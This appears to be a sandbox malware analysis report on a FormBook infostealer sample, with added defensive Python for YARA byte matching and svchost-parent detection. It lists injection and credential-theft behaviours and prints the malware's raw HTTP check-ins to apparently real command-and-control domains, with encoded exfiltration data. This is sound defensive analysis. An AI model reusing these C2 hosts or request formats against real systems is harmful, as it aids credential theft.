Windows Analysis Report
F2024-202202.exe

Overview

General Information

Sample name: F2024-202202.exe
Analysis ID: 1448090
MD5: 0e7042c3256ba6a60bee8cf70a18958c
SHA1: 06cd123e5cf1784d0b29415ebf6f58d4d4b21847
SHA256: 85c1c78badee38d490bb6cb18e5f2fd19dbe97355af3d6823ac3b1c93f63f751
Tags: exe

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Malicious sample detected (through community Yara rule)
Snort IDS alert for network traffic
Yara detected FormBook
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
Found direct / indirect Syscall (likely to bypass EDR)
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (date check)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Uncommon Svchost Parent Process
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • F2024-202202.exe (PID: 2108 cmdline: "C:\Users\user\Desktop\F2024-202202.exe" MD5: 0E7042C3256BA6A60BEE8CF70A18958C)
    • svchost.exe (PID: 5812 cmdline: "C:\Users\user\Desktop\F2024-202202.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
      • HCyQCFLUGWqlxNRVXC.exe (PID: 768 cmdline: "C:\Program Files (x86)\UXVNQUrSRqPxRBadJxKVFWzheeXuHYzhxNkawFDyQsGqAmMlIMgVqlRJUDHmkbuivlSB\HCyQCFLUGWqlxNRVXC.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • openfiles.exe (PID: 5700 cmdline: "C:\Windows\SysWOW64\openfiles.exe" MD5: 50BD10A4C573E609A401114488299D3D)
          • HCyQCFLUGWqlxNRVXC.exe (PID: 7132 cmdline: "C:\Program Files (x86)\UXVNQUrSRqPxRBadJxKVFWzheeXuHYzhxNkawFDyQsGqAmMlIMgVqlRJUDHmkbuivlSB\HCyQCFLUGWqlxNRVXC.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 5004 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup
No configs have been found
Memory dumps (Source / Rule / Description / Author / Strings):
Source: 00000005.00000002.3252950287.0000000002650000.00000004.00000800.00020000.00000000.sdmp | Rule: JoeSecurity_FormBook_1 | Description: Yara detected FormBook | Author: Joe Security
Source: 00000005.00000002.3252950287.0000000002650000.00000004.00000800.00020000.00000000.sdmp | Rule: Windows_Trojan_Formbook_1112e116 | Description: unknown | Author: unknown
  • 0x2bed0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x1577f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
Source: 00000002.00000002.2345744782.0000000004400000.00000040.10000000.00040000.00000000.sdmp | Rule: JoeSecurity_FormBook_1 | Description: Yara detected FormBook | Author: Joe Security
Source: 00000002.00000002.2345744782.0000000004400000.00000040.10000000.00040000.00000000.sdmp | Rule: Windows_Trojan_Formbook_1112e116 | Description: unknown | Author: unknown
  • 0x8db30:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x773df:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
Source: 00000004.00000002.3254116085.00000000033E0000.00000040.00000001.00040000.00000000.sdmp | Rule: JoeSecurity_FormBook_1 | Description: Yara detected FormBook | Author: Joe Security
(only the first entries are shown here; the full table has 11)

Unpacked PEs (Source / Rule / Description / Author / Strings):
Source: 2.2.svchost.exe.400000.0.unpack | Rule: JoeSecurity_FormBook_1 | Description: Yara detected FormBook | Author: Joe Security
Source: 2.2.svchost.exe.400000.0.unpack | Rule: Windows_Trojan_Formbook_1112e116 | Description: unknown | Author: unknown
  • 0x2e653:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x17f02:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
Source: 2.2.svchost.exe.400000.0.raw.unpack | Rule: JoeSecurity_FormBook_1 | Description: Yara detected FormBook | Author: Joe Security
Source: 2.2.svchost.exe.400000.0.raw.unpack | Rule: Windows_Trojan_Formbook_1112e116 | Description: unknown | Author: unknown
  • 0x2f453:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x18d02:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
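
The two hex strings listed for Windows_Trojan_Formbook_1112e116 are fixed byte sequences, which makes them easy to re-check outside the sandbox, for instance against a memory dump pulled from a suspect host. The example below is added to this page and is not code from Joe Security or from the rule's author: it compiles YARA-style hex strings into a bytes regex and reports every offset, overlapping ones included, and also accepts `??` wildcards, which the page's two strings do not use. The rule's condition is not shown on the page, so "any of them" is an assumption, and the buffer it scans is constructed here with the two strings planted at known offsets.

```python
import re

# The two hex strings this report lists for Windows_Trojan_Formbook_1112e116.
# The report finds them at 0x2bed0/0x1577f, 0x8db30/0x773df and 0x2e653/0x17f02
# in three of its dumps.
FORMBOOK_STRINGS = {
    "$a2": "74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55",
    "$a3": "1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01",
}


def hex_string_to_regex(hexstr):
    """Compile a YARA-style hex string (fixed bytes plus '??' wildcards) into a
    bytes regex. The pattern is wrapped in a lookahead so that overlapping
    matches are all reported, as YARA does. Jumps such as [4-6] are not handled."""
    parts = []
    for tok in hexstr.split():
        if tok == "??":
            parts.append(b".")
        elif len(tok) == 2 and all(c in "0123456789abcdefABCDEF" for c in tok):
            parts.append(b"\\x%02x" % int(tok, 16))
        else:
            raise ValueError(f"unsupported hex-string token: {tok!r}")
    return re.compile(b"(?=" + b"".join(parts) + b")", re.DOTALL)


def scan(data, strings=FORMBOOK_STRINGS):
    """Return {string_name: [offsets]} for every string, over the whole buffer."""
    return {name: [m.start() for m in hex_string_to_regex(h).finditer(data)]
            for name, h in strings.items()}


def rule_matches(data, strings=FORMBOOK_STRINGS):
    """Assumed condition 'any of them'; the real rule's condition is not on this page."""
    return any(scan(data, strings).values())


def build_sample():
    """Constructed buffer: NOP filler with $a2 planted at 0x40 and $a3 at 0x120."""
    buf = bytearray(b"\x90" * 0x200)
    for name, off in (("$a2", 0x40), ("$a3", 0x120)):
        raw = bytes.fromhex(FORMBOOK_STRINGS[name].replace(" ", ""))
        buf[off:off + len(raw)] = raw
    return bytes(buf)


if __name__ == "__main__":
    print(scan(build_sample()))
    print("FormBook rule matches:", rule_matches(build_sample()))
```

Against a real dump, `scan(open(path, "rb").read())` gives the offsets directly; on the first dump in this report the expected result is $a2 at 0x2bed0 and $a3 at 0x1577f. The lookahead matters for strings that can overlap themselves (repeated bytes), where a plain `finditer` would skip the second hit.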

            System Summary

Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "C:\Users\user\Desktop\F2024-202202.exe", CommandLine: "C:\Users\user\Desktop\F2024-202202.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\F2024-202202.exe", ParentImage: C:\Users\user\Desktop\F2024-202202.exe, ParentProcessId: 2108, ParentProcessName: F2024-202202.exe, ProcessCommandLine: "C:\Users\user\Desktop\F2024-202202.exe", ProcessId: 5812, ProcessName: svchost.exe
Source: Process started | Author: vburov | Data: Command: "C:\Users\user\Desktop\F2024-202202.exe", CommandLine: "C:\Users\user\Desktop\F2024-202202.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\F2024-202202.exe", ParentImage: C:\Users\user\Desktop\F2024-202202.exe, ParentProcessId: 2108, ParentProcessName: F2024-202202.exe, ProcessCommandLine: "C:\Users\user\Desktop\F2024-202202.exe", ProcessId: 5812, ProcessName: svchost.exe
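
The Sigma hit fires because svchost.exe (PID 5812) was started by F2024-202202.exe rather than by services.exe. The process tree shows a second tell in the same event: the new process's image is svchost.exe but its command line is still the parent's own path, which is what a hollowed host process looks like in telemetry. The example below is added to this page; it is neither the Sigma rule nor code from Joe Security. It runs both checks, plus a third heuristic (a service host started without `-k`, not something the page itself reports), over constructed Sysmon-style process-creation events whose PIDs, images and command lines are taken from the report's tree. The parent allow-list, the explorer.exe parent of the sample, the benign svchost.exe event and the field names are assumptions.

```python
import ntpath

# Parents that legitimately start svchost.exe. This approximates the filter of the
# Sigma rule "Uncommon Svchost Parent Process" and is an assumption here; tune it
# against your own telemetry before relying on it.
SVCHOST_PARENTS = {"services.exe", "msmpeng.exe", "mrt.exe", "rpcnet.exe",
                   "svchost.exe", "ngen.exe", "tiworker.exe"}

# Constructed Sysmon-style (Event ID 1) process-creation events. PIDs, images and
# command lines are the ones in this report's process tree; the parent of the
# sample (explorer.exe, PID 1234) and the benign svchost.exe event (PID 900) are
# assumptions added for contrast.
EVENTS = [
    {"ProcessId": 2108, "ParentProcessId": 1234,
     "Image": r"C:\Users\user\Desktop\F2024-202202.exe",
     "CommandLine": r'"C:\Users\user\Desktop\F2024-202202.exe"',
     "ParentImage": r"C:\Windows\explorer.exe"},
    {"ProcessId": 5812, "ParentProcessId": 2108,
     "Image": r"C:\Windows\SysWOW64\svchost.exe",
     "CommandLine": r'"C:\Users\user\Desktop\F2024-202202.exe"',
     "ParentImage": r"C:\Users\user\Desktop\F2024-202202.exe"},
    {"ProcessId": 768, "ParentProcessId": 5812,
     "Image": r"C:\Program Files (x86)\UXVNQUrSRqPxRBadJxKVFWzheeXuHYzhxNkawFDyQsGqAmMlIMgVqlRJUDHmkbuivlSB\HCyQCFLUGWqlxNRVXC.exe",
     "CommandLine": r'"C:\Program Files (x86)\UXVNQUrSRqPxRBadJxKVFWzheeXuHYzhxNkawFDyQsGqAmMlIMgVqlRJUDHmkbuivlSB\HCyQCFLUGWqlxNRVXC.exe"',
     "ParentImage": r"C:\Windows\SysWOW64\svchost.exe"},
    {"ProcessId": 5700, "ParentProcessId": 768,
     "Image": r"C:\Windows\SysWOW64\openfiles.exe",
     "CommandLine": r'"C:\Windows\SysWOW64\openfiles.exe"',
     "ParentImage": r"C:\Program Files (x86)\UXVNQUrSRqPxRBadJxKVFWzheeXuHYzhxNkawFDyQsGqAmMlIMgVqlRJUDHmkbuivlSB\HCyQCFLUGWqlxNRVXC.exe"},
    {"ProcessId": 5004, "ParentProcessId": 5700,
     "Image": r"C:\Program Files\Mozilla Firefox\firefox.exe",
     "CommandLine": r'"C:\Program Files\Mozilla Firefox\Firefox.exe"',
     "ParentImage": r"C:\Windows\SysWOW64\openfiles.exe"},
    {"ProcessId": 900, "ParentProcessId": 700,
     "Image": r"C:\Windows\System32\svchost.exe",
     "CommandLine": r"C:\Windows\System32\svchost.exe -k netsvcs -p -s Schedule",
     "ParentImage": r"C:\Windows\System32\services.exe"},
]


def first_token(cmdline):
    """Program path from a Windows command line, quoted or bare."""
    s = cmdline.strip()
    if s.startswith('"'):
        end = s.find('"', 1)
        return s[1:end] if end != -1 else s[1:]
    return s.split(None, 1)[0] if s else ""


def detect(events):
    """Run the three checks over each event and return the hits."""
    hits = []
    for ev in events:
        pid = ev["ProcessId"]
        image = ntpath.basename(ev["Image"]).lower()
        parent = ntpath.basename(ev["ParentImage"]).lower()
        cmdline = ev["CommandLine"]
        claimed = ntpath.basename(first_token(cmdline)).lower()

        # 1. The Sigma hit on this page: svchost.exe whose parent is not a service host.
        if image == "svchost.exe" and parent not in SVCHOST_PARENTS:
            hits.append({"rule": "uncommon_svchost_parent", "pid": pid,
                         "detail": f"parent={parent}"})
        # 2. Hollowing tell from the tree: the image on disk and the program named
        #    by the command line are different executables.
        if claimed and claimed != image:
            hits.append({"rule": "image_commandline_mismatch", "pid": pid,
                         "detail": f"image={image} cmdline={claimed}"})
        # 3. Extra heuristic (assumption, not reported on this page): a genuine
        #    service host is started with "-k <group>"; an injected one usually is not.
        if image == "svchost.exe" and " -k " not in f" {cmdline.lower()} ":
            hits.append({"rule": "svchost_without_k", "pid": pid, "detail": cmdline})
    return hits


if __name__ == "__main__":
    for hit in detect(EVENTS):
        print(hit)
```

Only PID 5812 trips the checks; the benign service host (parent services.exe, `-k netsvcs`) stays quiet. Check 2 compares basenames case-insensitively so that the Firefox event, whose command line spells the image with a different case, is not flagged.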
Snort IDS alerts (all TCP to destination port 80; classtype: A Network Trojan was detected), in chronological order:
  05/27/24-19:15:43.469777  SID 2855465  source port 49711
  05/27/24-19:16:10.032522  SID 2855464  source port 49713
  05/27/24-19:16:12.566468  SID 2855464  source port 49714
  05/27/24-19:16:17.928509  SID 2855465  source port 49716
  05/27/24-19:16:24.039251  SID 2855464  source port 49717
  05/27/24-19:16:26.567429  SID 2855464  source port 49718
  05/27/24-19:16:32.483493  SID 2855465  source port 49720
  05/27/24-19:16:59.270961  SID 2855464  source port 49721
  05/27/24-19:17:01.817147  SID 2855464  source port 49722


            AV Detection

Source: Yara match | File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000005.00000002.3252950287.0000000002650000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.2345744782.0000000004400000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.3254116085.00000000033E0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.3252870052.00000000005F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.3255683162.0000000004AC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.3252524118.0000000000130000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.2345390681.0000000003280000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.2345007571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: F2024-202202.exe | Joe Sandbox ML: detected
Source: F2024-202202.exe | Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
            Source: Binary string: OpnFiles.pdb source: svchost.exe, 00000002.00000003.2309893879.0000000002E13000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2309986096.0000000002E2B000.00000004.00000020.00020000.00000000.sdmp, HCyQCFLUGWqlxNRVXC.exe, 00000004.00000003.2562919899.0000000000F29000.00000004.00000001.00020000.00000000.sdmp, HCyQCFLUGWqlxNRVXC.exe, 00000004.00000003.2279464547.0000000000F1B000.00000004.00000001.00020000.00000000.sdmp
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: HCyQCFLUGWqlxNRVXC.exe, 00000004.00000000.2264662254.000000000010E000.00000002.00000001.01000000.00000005.sdmp, HCyQCFLUGWqlxNRVXC.exe, 00000006.00000000.2410177309.000000000010E000.00000002.00000001.01000000.00000005.sdmp
            Source: Binary string: wntdll.pdbUGP source: F2024-202202.exe, 00000000.00000003.2014375055.0000000003D40000.00000004.00001000.00020000.00000000.sdmp, F2024-202202.exe, 00000000.00000003.2014549447.0000000003EE0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2248825396.0000000003000000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2345425779.0000000003400000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2345425779.000000000359E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2250328113.0000000003200000.00000004.00000020.00020000.00000000.sdmp, openfiles.exe, 00000005.00000002.3254305828.000000000461E000.00000040.00001000.00020000.00000000.sdmp, openfiles.exe, 00000005.00000003.2345302031.0000000004115000.00000004.00000020.00020000.00000000.sdmp, openfiles.exe, 00000005.00000002.3254305828.0000000004480000.00000040.00001000.00020000.00000000.sdmp, openfiles.exe, 00000005.00000003.2347471193.00000000042CC000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: F2024-202202.exe, 00000000.00000003.2014375055.0000000003D40000.00000004.00001000.00020000.00000000.sdmp, F2024-202202.exe, 00000000.00000003.2014549447.0000000003EE0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000003.2248825396.0000000003000000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2345425779.0000000003400000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2345425779.000000000359E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2250328113.0000000003200000.00000004.00000020.00020000.00000000.sdmp, openfiles.exe, openfiles.exe, 00000005.00000002.3254305828.000000000461E000.00000040.00001000.00020000.00000000.sdmp, openfiles.exe, 00000005.00000003.2345302031.0000000004115000.00000004.00000020.00020000.00000000.sdmp, openfiles.exe, 00000005.00000002.3254305828.0000000004480000.00000040.00001000.00020000.00000000.sdmp, openfiles.exe, 00000005.00000003.2347471193.00000000042CC000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: OpnFiles.pdbGCTL source: svchost.exe, 00000002.00000003.2309893879.0000000002E13000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2309986096.0000000002E2B000.00000004.00000020.00020000.00000000.sdmp, HCyQCFLUGWqlxNRVXC.exe, 00000004.00000003.2562919899.0000000000F29000.00000004.00000001.00020000.00000000.sdmp, HCyQCFLUGWqlxNRVXC.exe, 00000004.00000003.2279464547.0000000000F1B000.00000004.00000001.00020000.00000000.sdmp
            Source: Binary string: svchost.pdb source: openfiles.exe, 00000005.00000002.3253131424.000000000275A000.00000004.00000020.00020000.00000000.sdmp, openfiles.exe, 00000005.00000002.3254850708.0000000004AAC000.00000004.10000000.00040000.00000000.sdmp, HCyQCFLUGWqlxNRVXC.exe, 00000006.00000000.2410616230.000000000268C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2680745913.0000000003A5C000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: svchost.pdbUGP source: openfiles.exe, 00000005.00000002.3253131424.000000000275A000.00000004.00000020.00020000.00000000.sdmp, openfiles.exe, 00000005.00000002.3254850708.0000000004AAC000.00000004.10000000.00040000.00000000.sdmp, HCyQCFLUGWqlxNRVXC.exe, 00000006.00000000.2410616230.000000000268C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2680745913.0000000003A5C000.00000004.80000000.00040000.00000000.sdmp
Source: C:\Users\user\Desktop\F2024-202202.exe | Code function 0_2_001E4696: GetFileAttributesW, FindFirstFileW, FindClose
Source: C:\Users\user\Desktop\F2024-202202.exe | Code function 0_2_001EC93C: FindFirstFileW, FindClose
Source: C:\Users\user\Desktop\F2024-202202.exe | Code function 0_2_001EC9C7: FindFirstFileW, FindClose, FileTimeToLocalFileTime, FileTimeToLocalFileTime, FileTimeToLocalFileTime, FileTimeToSystemTime, __swprintf, __swprintf, __swprintf, __swprintf, __swprintf, __swprintf, __swprintf
Source: C:\Users\user\Desktop\F2024-202202.exe | Code function 0_2_001EF200: SetCurrentDirectoryW, FindFirstFileW, FindFirstFileW, _wcscmp, _wcscmp, GetFileAttributesW, SetFileAttributesW, FindNextFileW, FindClose, FindFirstFileW, SetCurrentDirectoryW, _wcscmp, _wcscmp, SetCurrentDirectoryW, SetCurrentDirectoryW, FindNextFileW, FindClose, FindClose
Source: C:\Users\user\Desktop\F2024-202202.exe | Code function 0_2_001EF35D: SetCurrentDirectoryW, FindFirstFileW, FindFirstFileW, _wcscmp, _wcscmp, FindNextFileW, FindClose, FindFirstFileW, SetCurrentDirectoryW, _wcscmp, _wcscmp, SetCurrentDirectoryW, SetCurrentDirectoryW, FindNextFileW, FindClose, FindClose
Source: C:\Users\user\Desktop\F2024-202202.exe | Code function 0_2_001EF65E: FindFirstFileW, Sleep, _wcscmp, _wcscmp, FindNextFileW, FindClose
Source: C:\Users\user\Desktop\F2024-202202.exe | Code function 0_2_001E3A2B: FindFirstFileW, DeleteFileW, DeleteFileW, MoveFileW, DeleteFileW, FindNextFileW, FindClose, FindClose
Source: C:\Users\user\Desktop\F2024-202202.exe | Code function 0_2_001E3D4E: FindFirstFileW, DeleteFileW, FindNextFileW, FindClose, FindClose
Source: C:\Users\user\Desktop\F2024-202202.exe | Code function 0_2_001EBF27: FindFirstFileW, _wcscmp, _wcscmp, FindNextFileW, FindClose
Source: C:\Windows\SysWOW64\openfiles.exe | Code function 5_2_0014D4E0: FindFirstFileW, FindNextFileW, FindClose
Source: C:\Windows\SysWOW64\openfiles.exe | Code function 5_2_0013AE80: 4x nop then xor eax, eax
Source: C:\Windows\SysWOW64\openfiles.exe | Code function 5_2_0013F874: 4x nop then pop edi

            Networking

Source: Traffic | Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.5:49711 -> 66.113.136.229:80
Source: Traffic | Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.5:49713 -> 194.58.112.174:80
Source: Traffic | Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.5:49714 -> 194.58.112.174:80
Source: Traffic | Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.5:49716 -> 194.58.112.174:80
Source: Traffic | Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.5:49717 -> 43.132.225.97:80
Source: Traffic | Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.5:49718 -> 43.132.225.97:80
Source: Traffic | Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.5:49720 -> 43.132.225.97:80
Source: Traffic | Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.5:49721 -> 188.114.96.3:80
Source: Traffic | Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.5:49722 -> 188.114.96.3:80
Source: Joe Sandbox View | IP Address: 43.132.225.97
Source: Joe Sandbox View | IP Address: 194.58.112.174
Source: Joe Sandbox View | IP Address: 66.113.136.229
Source: Joe Sandbox View | ASN Name: LILLY-ASUS
Source: Joe Sandbox View | ASN Name: AS-REGRU
Source: Joe Sandbox View | ASN Name: AFFINITY-FTLUS
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1 (reported 5 times)
Source: C:\Users\user\Desktop\F2024-202202.exe | Code function 0_2_001F25E2: InternetReadFile, InternetQueryDataAvailable, InternetReadFile
Source: global traffic | HTTP traffic detected:
  GET /0so0/?X430XLq0=CY1s0XH7bNWttwV9rZ4SbfagXQ6dqpRCQvxAN47rZ58SWMnAte1QXQdn29aNO6h1oK8GMPzGoaIoZ8sBEayCkb2ait1G89/ayPLVJ4jhwFoJQSPoL8Uww1rncwUMKC4qFA==&Wd=vjk8lhT0U4 HTTP/1.1
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
  Accept-Language: en-US,en;q=0.9
  Host: www.goodroothealth.com
  Connection: close
  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
Source: global traffic | HTTP traffic detected:
  GET /0so0/?Wd=vjk8lhT0U4&X430XLq0=SUPNUPL8X55ZGDaBFxP5SDbwzWvdce9LIUPHC0QIzt1ZKzL94hFLYJx7/4VaKoGV20qcYSFkx0JiG8qMm/Id/bOZDN/8qZd0HZpra/ntz1I1MPsqBdN1VMBNg4zQsHhwAw== HTTP/1.1
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
  Accept-Language: en-US,en;q=0.9
  Host: www.make-l.ru
  Connection: close
  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
Source: global traffic | HTTP traffic detected:
  GET /0so0/?X430XLq0=ZXsyqv6OWO1jdfmZwPHK8dAntN05Z+dsmugw9BJBTbqyaa2WOVN+U2naZpjsCmE4tUAeXtTgCCsmM8Dup6ejRXHoa4TAR4CFgRPYrdUpMYgqMRztZg/3Zk7YYa9ZW1B17w==&Wd=vjk8lhT0U4 HTTP/1.1
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
  Accept-Language: en-US,en;q=0.9
  Host: www.kguyreoalpha.shop
  Connection: close
  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
Source: global traffic | DNS query: www.sweet777.work
Source: global traffic | DNS query: www.goodroothealth.com
Source: global traffic | DNS query: www.make-l.ru
Source: global traffic | DNS query: www.kguyreoalpha.shop
Source: global traffic | DNS query: www.waldil.online
Source: unknown | HTTP traffic detected:
  POST /0so0/ HTTP/1.1
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
  Accept-Encoding: gzip, deflate, br
  Accept-Language: en-US,en;q=0.9
  Host: www.make-l.ru
  Cache-Control: no-cache
  Content-Length: 209
  Content-Type: application/x-www-form-urlencoded
  Connection: close
  Origin: http://www.make-l.ru
  Referer: http://www.make-l.ru/0so0/
  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
  Data Raw: 58 34 33 30 58 4c 71 30 3d 66 57 6e 74 58 34 37 33 48 61 64 4b 4e 48 50 57 50 51 2f 54 55 52 4f 36 79 6d 6e 59 65 35 35 4b 4e 6b 48 58 62 56 51 34 36 62 70 35 44 41 47 75 6d 69 73 67 58 36 39 64 6a 4a 6b 59 41 35 69 49 39 6b 33 6a 55 68 49 79 2f 41 55 63 48 5a 53 50 31 65 73 51 38 4c 4f 6a 58 66 57 59 68 34 74 6c 48 62 78 4a 47 35 50 6a 31 6a 30 6a 4d 65 59 7a 50 4f 42 73 54 34 59 47 71 70 6a 2b 7a 33 6b 5a 46 6f 6b 56 53 71 6f 73 51 65 4e 61 47 59 57 50 61 52 50 4a 34 44 75 69 4a 4a 6b 44 65 6c 47 32 30 48 67 4a 54 59 39 68 59 4c 64 77 76 32 4f 32 78 2f 64 77 63 61 50 56 32 47 41 70 56 32 4b 54 55 6d 53 6d 66 65 59 3d
  Data Ascii: X430XLq0=fWntX473HadKNHPWPQ/TURO6ymnYe55KNkHXbVQ46bp5DAGumisgX69djJkYA5iI9k3jUhIy/AUcHZSP1esQ8LOjXfWYh4tlHbxJG5Pj1j0jMeYzPOBsT4YGqpj+z3kZFokVSqosQeNaGYWPaRPJ4DuiJJkDelG20HgJTY9hYLdwv2O2x/dwcaPV2GApV2KTUmSmfeY=
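
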